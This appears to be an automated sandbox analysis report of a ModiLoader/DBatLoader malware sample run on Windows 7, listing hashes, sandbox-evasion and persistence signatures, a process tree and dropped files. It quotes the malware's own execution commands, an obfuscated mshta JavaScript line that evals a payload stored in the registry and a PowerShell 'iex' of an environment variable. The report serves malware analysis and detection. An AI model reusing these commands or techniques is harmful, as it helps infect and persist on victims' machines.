Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    04-05-2024 05:01

General

  • Target

    118efcc13349720fda57911483211b02_JaffaCakes118.exe

  • Size

    368KB

  • MD5

    118efcc13349720fda57911483211b02

  • SHA1

    8d305040a3453a6ea2fefa81214840123ca623ec

  • SHA256

    14445511f62011b381b70c70d3d816a6316368b560a5bd605e0fadb8d1d67918

  • SHA512

    010341ea9f1564d864a6eee00170851933edefaa50413fda65cc482953850fa606dce478f235638ba13637f7b9332d457a3b5acad8f2f88168af9e97d16e6dc9

  • SSDEEP

    6144:rpzihDNamsZbXSAcIs0o7TCV0sq2F9XDFOiwtXK/JOMp:dih0J8is0Q+V0eF9TFBYcp

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 40 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\118efcc13349720fda57911483211b02_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\118efcc13349720fda57911483211b02_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2796
    • C:\Users\Admin\AppData\Local\Temp\118efcc13349720fda57911483211b02_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\118efcc13349720fda57911483211b02_JaffaCakes118.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1804
      • C:\Users\Admin\AppData\Local\Temp\0.exe
        "C:\Users\Admin\AppData\Local\Temp\0.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1144
        • C:\Users\Admin\AppData\Local\Temp\0.exe
          "C:\Users\Admin\AppData\Local\Temp\0.exe"
          4⤵
          • Executes dropped EXE
          PID:2652
  • C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" javascript:IeOw68Xk="LHB";tZ29=new%20ActiveXObject("WScript.Shell");UoKTiJV5="Dx";nNrA54=tZ29.RegRead("HKLM\\software\\Wow6432Node\\xWGJkvV5Bw\\3iQz2MC");RpIaAH6xC="phwgmCwKQV";eval(nNrA54);k76teWrqi="IN";
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2620
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:suko
      2⤵
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2524
      • C:\Windows\SysWOW64\regsvr32.exe
        regsvr32.exe
        3⤵
        • Looks for VirtualBox Guest Additions in registry
        • Looks for VirtualBox drivers on disk
        • Looks for VMWare Tools registry key
        • Checks BIOS information in registry
        • Drops startup file
        • Adds Run key to start application
        • Maps connected drives based on registry
        • Suspicious use of SetThreadContext
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:1816
        • C:\Windows\SysWOW64\regsvr32.exe
          "C:\Windows\SysWOW64\regsvr32.exe"
          4⤵
            PID:2076

    Network

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Users\Admin\AppData\Local\529d1c\1bcd8a.lnk (881B)
      MD5: 1f10bb85754a7e795a07dc1a8fa11204
      SHA1: 8f2ed1e50d3ee051d545567c18f0674b0c69318c
      SHA256: c865187b33716d78d9924ffcd04748480badba9a2c95e6ca738b8c938626c65d
      SHA512: 9c33a4e6ab1f9a1a6a29fe25656e9da42decf3dc18b81b828b5bd5d8582d1ed3a590118c5cc0900ee4382e1e1744064e68ee08881997789421952a0893aa1461

    • C:\Users\Admin\AppData\Local\529d1c\4bd7f2.bat (61B)
      MD5: 7f145f9c460ee7bb55a3e7ad72a65f86
      SHA1: 39a73f2119c72ae27a166fff9ceb13859f6ac21b
      SHA256: 16e3704ce7a5f142fe817cd42cf9fd214341caf20a284c439457feb84515ddad
      SHA512: 1bfbf2931d904ae08d6552267b918e8f7e6cce6d142f0c950c74e2e601dc3cf36428fcddf67ad3cae1acb565edf4871c0c3c165be88c34d3c81b68b8d7c1a75f

    • C:\Users\Admin\AppData\Local\529d1c\7fd902.cbe78f1 (39KB)
      MD5: 9e5b711fe9e089c6cf871dbfa6aac253
      SHA1: c2eacf0bbf070b5790cbe5e92e1f6fc53a971414
      SHA256: 85b49ee90e4c3e82ec31cf63e05e84218964ba14c15ea10c851e51caa9a257f5
      SHA512: e54040df7fd709b0bec09b11cc7a08d21213a3dd461c6d7dd98792ce45cee888ed888aedd486c713fa6a2fe12c3dfba46e00d14ad2ce43c7d06eb1bbc7464fdd

    • C:\Users\Admin\AppData\Roaming\4f4be6\d3bc4d.cbe78f1 (15KB)
      MD5: 5381f07daa923e70d78a829e6ac96f80
      SHA1: 1f587d86b88385faf4d2feb2d3bceab2ad4e3d6b
      SHA256: e7a9cb6295b5c67bf4e758efbb64091891a4c3418e677ceab837ed51fb8f7b0b
      SHA512: 026367e1b1cd3b2e0e0e8827787318b26bcb29405e943740793ceb33789134e2353484dcbc56d5c8c5e58a4d83b700665f5c2da80bbd6576a507e77729e22b2e

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\54b061.lnk (991B)
      MD5: 3ea5356ec7643199ab02d733229db045
      SHA1: b80a07599657cba578519155280ec42c4e5b7440
      SHA256: 15c1d340ff97644ea10ad327c54fe5fe9b23e068aa71aae033fad88eb26dfa26
      SHA512: 0d560e4f549e3731b1a964067874edb8bd2bde33874ad1805b8188716ac9a13899744fc092d908748086fec8c4a2700f2780c88fb26b257e42b8b1280968db09

    • \Users\Admin\AppData\Local\Temp\0.exe (296KB)
      MD5: 4ed6da10001dec308a436038ff943b89
      SHA1: 290d3118fb3c2f256c3c533fcddd8c413f65debb
      SHA256: f1bb7c9bebc9b1fc7a4cb115c108fd30af91e28c6bca6af13fedf86556c1044f
      SHA512: 1b47b8161854fd7e15c169ead50edd4900c68a018eb30bb476e21101e94b06220aa2c41d650fe8acada2e70e0c1dd5822222ebdce2c16aedb46073c129e66749

    • memory/1804-2-0x0000000000400000-0x0000000000454000-memory.dmp (336KB)
    • memory/1804-14-0x0000000000400000-0x0000000000454000-memory.dmp (336KB)
    • memory/1804-11-0x0000000000400000-0x0000000000454000-memory.dmp (336KB)
    • memory/1804-10-0x0000000000400000-0x0000000000454000-memory.dmp (336KB)
    • memory/1804-0-0x0000000000400000-0x0000000000454000-memory.dmp (336KB)
    • memory/1804-4-0x0000000000400000-0x0000000000454000-memory.dmp (336KB)
    • memory/1804-8-0x0000000000400000-0x0000000000454000-memory.dmp (336KB)
    • memory/1804-6-0x0000000000400000-0x0000000000454000-memory.dmp (336KB)
    • memory/1816-71-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-76-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-79-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-81-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-80-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-65-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-59-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-66-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-68-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-69-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-73-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-55-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-56-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-62-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-63-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-67-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-60-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-70-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-72-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-61-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-74-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-64-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-77-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-78-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/1816-75-0x00000000001B0000-0x00000000002EE000-memory.dmp (1.2MB)
    • memory/2524-53-0x00000000060E0000-0x00000000061B4000-memory.dmp (848KB)
    • memory/2524-58-0x00000000060E0000-0x00000000061B4000-memory.dmp (848KB)
    • memory/2652-41-0x0000000001D80000-0x0000000001E54000-memory.dmp (848KB)
    • memory/2652-35-0x0000000000400000-0x0000000000439000-memory.dmp (228KB)
    • memory/2652-44-0x0000000001D80000-0x0000000001E54000-memory.dmp (848KB)
    • memory/2652-43-0x0000000001D80000-0x0000000001E54000-memory.dmp (848KB)
    • memory/2652-39-0x0000000001D80000-0x0000000001E54000-memory.dmp (848KB)
    • memory/2652-40-0x0000000001D80000-0x0000000001E54000-memory.dmp (848KB)
    • memory/2652-36-0x0000000000400000-0x0000000000439000-memory.dmp (228KB)
    • memory/2652-42-0x0000000001D80000-0x0000000001E54000-memory.dmp (848KB)
    • memory/2652-38-0x0000000001D80000-0x0000000001E54000-memory.dmp (848KB)
    • memory/2652-37-0x0000000000400000-0x0000000000439000-memory.dmp (228KB)
    • memory/2652-26-0x0000000000400000-0x0000000000439000-memory.dmp (228KB)
    • memory/2652-28-0x0000000000400000-0x0000000000439000-memory.dmp (228KB)
    • memory/2652-30-0x0000000000400000-0x0000000000439000-memory.dmp (228KB)
    • memory/2652-32-0x0000000000400000-0x0000000000439000-memory.dmp (228KB)
    • memory/2652-24-0x0000000000400000-0x0000000000439000-memory.dmp (228KB)